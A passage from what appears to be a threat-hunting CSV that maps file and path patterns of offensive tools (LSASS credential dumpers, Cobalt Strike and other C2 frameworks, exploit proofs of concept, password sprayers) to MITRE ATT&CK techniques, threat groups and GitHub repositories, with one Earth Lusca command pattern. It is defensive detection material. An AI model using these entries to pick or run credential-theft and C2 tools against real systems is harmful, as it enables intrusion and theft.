T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/pwn1sher/CS-BOFs,1,1,N/A,10,10,100,23,2022-02-14T09:47:30Z,2021-01-18T08:54:48Z 
-*/LSASSProtectionBypass/CredGuard.c*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,1,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*/LsassSilentProcessExit.git*,offensive_tool_keyword,LsassSilentProcessExit,Command line interface to dump LSASS memory to disk via SilentProcessExit,T1003.001 - T1059.003,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/deepinstinct/LsassSilentProcessExit,1,1,N/A,10,5,421,64,2020-12-23T11:51:21Z,2020-11-29T08:49:42Z -*/lsassy*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*/lucksec/CVE-2022-0847*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/lucksec/CVE-2022-0847,1,1,N/A,N/A,1,1,4,2022-03-08T01:50:39Z,2022-03-08T01:17:09Z -*/lu-enum.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/luijait/arpspoofing*,offensive_tool_keyword,arpspoofing,arp spoofing scripts,T1595,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/luijait/arpspoofing,1,1,N/A,N/A,1,15,1,2022-03-10T04:44:36Z,2021-06-29T22:57:51Z -*/ly4k/Pachine*,offensive_tool_keyword,Pachine,Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation),T1068 - T1078 - T1059.006,TA0003 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/ly4k/Pachine,1,1,N/A,8,3,262,37,2022-01-13T12:35:19Z,2021-12-13T23:15:05Z -*/lyncsmash/*,offensive_tool_keyword,lyncsmash,a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ,T1190 - T1087 - T1110,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/nyxgeek/lyncsmash,1,1,N/A,N/A,4,323,68,2023-05-03T19:07:11Z,2016-05-20T04:32:41Z -*/LyncSniper.ps1*,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,1,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*/m *.lnk* /c *cmd /c echo f|xcopy @file %temp%*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/m3-gen.py *,offensive_tool_keyword,MaliciousMacroMSBuild,Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.,T1059.001 - T1059.003 - T1127 - T1027.002,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/MaliciousMacroMSBuild,1,0,N/A,8,5,488,117,2019-08-06T08:16:05Z,2018-04-09T23:16:30Z -*/m4ll0k/*,offensive_tool_keyword,Github Username,github username 'hacker' hosting exploitaitont tools and passwords attacks tools,N/A,N/A,N/A,N/A,Credential Access,https://github.com/m4ll0k,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/m8r0wn/*,offensive_tool_keyword,Github Username,pentester github username hosting exploitation tools,N/A,N/A,N/A,N/A,Exploitation 
tools,https://github.com/m8r0wn,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/MAAD-AF.git*,offensive_tool_keyword,MAAD-AF,MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ,T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204,TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005,N/A,N/A,Network Exploitation tools,https://github.com/vectra-ai-research/MAAD-AF,1,1,N/A,N/A,3,293,43,2023-09-27T02:49:59Z,2023-02-09T02:08:07Z -*/MaccaroniC2*,offensive_tool_keyword,MaccaroniC2,A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.,T1090 - T1059.003,TA0011 - TA0002,N/A,N/A,C2,https://github.com/CalfCrusher/MaccaroniC2,1,1,N/A,10,10,57,9,2023-06-27T17:43:59Z,2023-05-21T13:33:48Z -*/MacroMeter*,offensive_tool_keyword,MacroMeter,VBA Reversed TCP Meterpreter Stager CSharp Meterpreter Stager build by Cn33liz and embedded within VBA using DotNetToJScript from James Forshaw https://github.com/tyranid/DotNetToJScript,T1027 - T1059 - T1564 - T1071,TA0002 - TA0003 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/Cn33liz/MacroMeter,1,0,N/A,N/A,1,62,31,2018-04-23T09:14:49Z,2017-05-16T20:04:41Z -*/MacroPatterns.cs*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,1,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*/Macro-Payloads.py*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/MacroWord_Payload/macro.txt*,offensive_tool_keyword,Mystikal,macOS Initial Access Payload Generator,T1059.005 - T1204.002 - T1566.001,TA0002 - TA0001,N/A,N/A,Exploitation tools,https://github.com/D00MFist/Mystikal,1,1,N/A,9,3,245,35,2023-05-10T15:21:26Z,2021-05-03T14:46:16Z -*/magnitude.profile*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*/MailRaider.ps1*,offensive_tool_keyword,DBC2,DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.,T1105 - T1071.004 - T1102,TA0003 - TA0002 - TA0008,N/A,N/A,C2,https://github.com/Arno0x/DBC2,1,1,N/A,10,10,269,85,2017-10-27T07:39:02Z,2016-12-14T10:35:56Z -*/MailRaider.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1129,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*/MailSniper/*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*/main/cve-2022-0847.c*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/bbaranoff/CVE-2022-0847,1,1,N/A,N/A,1,49,25,2022-03-07T15:52:23Z,2022-03-07T15:50:18Z -*/main/exploit.js,offensive_tool_keyword,POC,Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ,T1203 - T1218 - T1059 - T1064 - T1204,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/hacksysteam/CVE-2023-21608,1,1,N/A,N/A,3,250,57,2023-02-27T04:51:20Z,2023-01-30T12:57:48Z -*/main/exploit.pdf,offensive_tool_keyword,POC,Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ,T1203 - T1218 - T1059 - T1064 - T1204,TA0001 - TA0002,N/A,N/A,Exploitation tools,https://github.com/hacksysteam/CVE-2023-21608,1,1,N/A,N/A,3,250,57,2023-02-27T04:51:20Z,2023-01-30T12:57:48Z -*/MaliciousMacroMSBuild*,offensive_tool_keyword,MaliciousMacroMSBuild,Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.,T1059.001 - T1059.003 - T1127 - T1027.002,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/MaliciousMacroMSBuild,1,1,N/A,8,5,488,117,2019-08-06T08:16:05Z,2018-04-09T23:16:30Z -*/malleable-c2*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/malleable-c2,1,1,N/A,10,10,1326,282,2023-08-01T15:07:51Z,2018-08-14T14:19:43Z -*/MalSCCM.git*,offensive_tool_keyword,MalSCCM,This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage,T1072 - T1059.005 - T1090,TA0008 - TA0002 - TA0011,N/A,N/A,Exploitation tools,https://github.com/nettitude/MalSCCM,1,1,N/A,10,3,223,34,2023-09-28T17:29:50Z,2022-05-04T08:27:27Z -*/MalSCCM.sln*,offensive_tool_keyword,MalSCCM,This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage,T1072 - T1059.005 - T1090,TA0008 - TA0002 - TA0011,N/A,N/A,Exploitation tools,https://github.com/nettitude/MalSCCM,1,1,N/A,10,3,223,34,2023-09-28T17:29:50Z,2022-05-04T08:27:27Z -*/malseclogon.*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*/MalStuff.cpp*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,1,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*/man_in_the_browser/*.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/man_in_the_browser/*.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/manage/exec_cmd*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/Management/C2/*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*/manjusaka/plugins*,offensive_tool_keyword,cobaltstrike,Chinese clone of cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/YDHCUI/manjusaka,1,1,N/A,10,10,664,132,2023-05-09T03:31:53Z,2022-03-18T08:16:04Z 
-*/MANSPIDER.git*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,1,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*/manspider_*.log*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*/manspider_output*.txt,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/manspiderDump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/master/GPSCoordinates/*,offensive_tool_keyword,GPSCoordinates,Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled,T1018 - T1059.001,TA0001 - TA0002,N/A,N/A,Reconnaissance,https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*/master/JunctionFolder/*,offensive_tool_keyword,JunctionFolder,Creates a junction 
folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.,T1547.001 - T1574.001 - T1204.002,TA0005 - TA0004,N/A,N/A,Persistence - Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*/master/PhantomService/*,offensive_tool_keyword,PhantomService,Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools,T1050.005 - T1055.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*/maxdb-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/mcafee-epo-agent.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/megatools.exe*,greyware_tool_keyword,megatools,Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://github.com/megous/megatools,1,0,N/A,9,10,N/A,N/A,N/A,N/A -*/membase-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/membase-http-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/memcached-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/memodipper64*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/memory_exec.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/memorydump.py*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,0,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*/mempodipper.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/MemReader_BoF/*,offensive_tool_keyword,cobaltstrike,MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trainr3kt/MemReader_BoF,1,1,N/A,10,10,26,3,2022-05-12T18:46:02Z,2021-04-21T20:51:25Z -*/merlin.dll*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*/merlin.html*,offensive_tool_keyword,merlin,Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and 